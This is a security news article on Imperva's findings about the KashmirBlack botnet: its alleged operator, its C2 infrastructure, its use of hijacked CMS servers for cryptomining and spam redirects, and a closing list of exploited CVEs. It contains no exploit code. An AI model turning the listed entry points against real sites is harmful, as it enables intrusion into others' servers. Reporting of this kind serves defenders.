Researchers at Imperva has documented a botnet’s operations called KashmirBlack, who were believed to be behind the attacks against WordPress, Drupal, and other CMS. The group has grown big to infect thousands of sites per day and use their underlying servers for mining cryptocurrencies and spam redirections.
Hacking Sites For Mining Cryptocurrencies
Cryptocurrency mining needs extensive resources to work. While it can be done on basic computers and phones, they garner nothing but peanuts. Thus, using high-end servers and GPUs are effective. While these cost much, hacking them to run mining softwares and mint coins is easy. This is practiced by a botnet named KashmirBlack.
As per the reports (1, 2) from Imperva, a cybersecurity firm, a botnet group named KashmirBlack is said to be behind the attack against CMS like WordPress, Joomla!, Drupal, PrestaShop, Magneto, osCommerce, vBulletin, Yeager, and OpenCart. Researchers claim the KashmirBlack operator Exect1337, a member of the Indonesian hacker crew PhantomGhost, is scanning the internet for target sites.
The group (or a person) initially search for sites running old softwares and exploit them with known vulnerabilities. After hijacking them, they install takeover the underlying servers to use them for cryptocurrencies mining, redirecting the traffic to spam sites, and showing web defacements.
Researchers say the botnet group has started its operations in November last year and grown big ever since.
It turned sophisticated in May this year, where it upgraded its C2 server and able to infect thousands of sites per day. To date, it believed to infect hundreds of thousands of websites by attacking their underlying CMS or some components of those CMS.
It’s now managed “by one C&C (Command and Control) server and uses more than 60 – mostly innocent surrogate – servers as part of its infrastructure,” told the Imperva researchers.
Further, “[The botnet] handles hundreds of bots, each communicating with the C&C to receive new targets, perform brute force attacks, install backdoors, and expand the size of the botnet.”
Since it’s inception, the botnet is said to be abusing sites around the world that were having these vulnerabilities;
- WordPress install.php RCE
- WordPress xmlrpc.php Login Brute-Force attack
- WordPress multiple Plugins RCE
- WordPress multiple Themes RCE
- WordPress TimThumb RFI Vulnerability – CVE-2011-4106
- Webdav file upload vulnerability
- Joomla! remote file upload vulnerability
- Magento Local File Inclusion – CVE-2015-2067
- Yeager CMS vulnerability – CVE-2015-7571
- PHPUnit Remote Code Execution – CVE-2017-9841
- jQuery file upload vulnerability – CVE-2018-9206
- ELFinder Command Injection – CVE-2019-9194
- vBulletin Widget RCE – CVE-2019-16759
- Uploadify RCE vulnerability